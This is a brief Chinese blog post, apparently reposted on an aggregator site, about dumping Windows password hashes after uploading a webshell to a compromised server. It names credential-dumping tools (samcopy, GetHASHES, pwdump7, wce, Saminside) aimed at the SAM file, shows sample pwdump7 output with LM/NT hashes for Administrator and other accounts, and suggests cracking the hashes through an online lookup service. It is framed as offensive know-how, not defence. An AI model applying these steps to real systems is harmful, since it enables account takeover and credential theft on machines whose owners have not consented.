windows 抓hash获取管理员密码

Posted yuanzijian-ruiec

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了windows 抓hash获取管理员密码相关的知识,希望对你有一定的参考价值。

webshell 找能执行权限的目录上传

技术图片

C:\\Windows\\System32\\config\\sam 内有windows 密码 利用工具把密码抓出来

samcopy 直接抓取

GetHASHES.exe $Local 返回当前系统所有的用户的哈希

pwdump7.exe 自动抓取哈希 都是用cmd 执行 来宾和system 一般都没有密码

wce.exe 自动抓哈希

Saminside 字典破解

破解sam密码 

我一般用pwdump7 执行后返回

Administrator:500:7B59ACC609CD473AF50785CA52198E4D:92748A4523592194AF8963A1949FCA0B:::

Guest:501:64C3E77603C7A3BF5A5E17C210A88A96:30CFBECB0A6FD6BADBAB21A275788798:::

:503:4F07A12B796A954B583F6D0501D59953:A0D5FADC55DA895E937A93ED39669D76:::

:504:9D8835529B6E728C4CEE482ECCDDD9CE:0A51EEE494AB8F940DB69BC2FCA4E648:::

test:1001:F5942A1378FEC39E6ACBF03ADAEE3EB1:8DFE55D2D16AA9E2DA4F44412E897201:::

密码格式为

技术图片

nt-hash 直接丢到cmd5里解密 可以得到密码

 

以上是关于windows 抓hash获取管理员密码的主要内容,如果未能解决你的问题,请参考以下文章

浩顺晶密指纹考勤机忘记超级管理员密码且不能与电脑连接,如何重新进入考勤机进行设置? v5(新)求解。

酷享CMS企业级授权系统源码 有工单系统 盗版检测

从提升的子进程获取错误和标准输出

国密算法的ekey的使用--简述

SKF密码设备研究

Gitee之SSH与HTTPS免密(权限)配置